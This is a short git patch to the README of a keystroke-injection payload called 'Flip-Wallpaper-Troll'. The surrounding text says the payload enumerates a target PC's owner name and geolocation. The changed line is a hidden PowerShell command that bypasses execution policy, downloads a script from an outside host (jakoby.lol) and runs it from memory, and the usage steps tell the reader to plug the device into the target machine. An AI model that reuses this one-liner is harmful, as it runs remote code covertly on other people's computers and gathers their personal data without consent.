From 6408f402fa2e851072eed90f54ee8634fee3c0a8 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 1 Jan 2023 17:19:17 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-Wallpaper-Troll/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Wallpaper-Troll/README.md b/Payloads/Flip-Wallpaper-Troll/README.md index d840a0d..1278ad9 100644 --- a/Payloads/Flip-Wallpaper-Troll/README.md +++ b/Payloads/Flip-Wallpaper-Troll/README.md @@ -36,7 +36,7 @@ This program enumerates a target PC to get their Name, GeoLocation (Latitude and * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/b8n | iex +powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex ```

(back to top)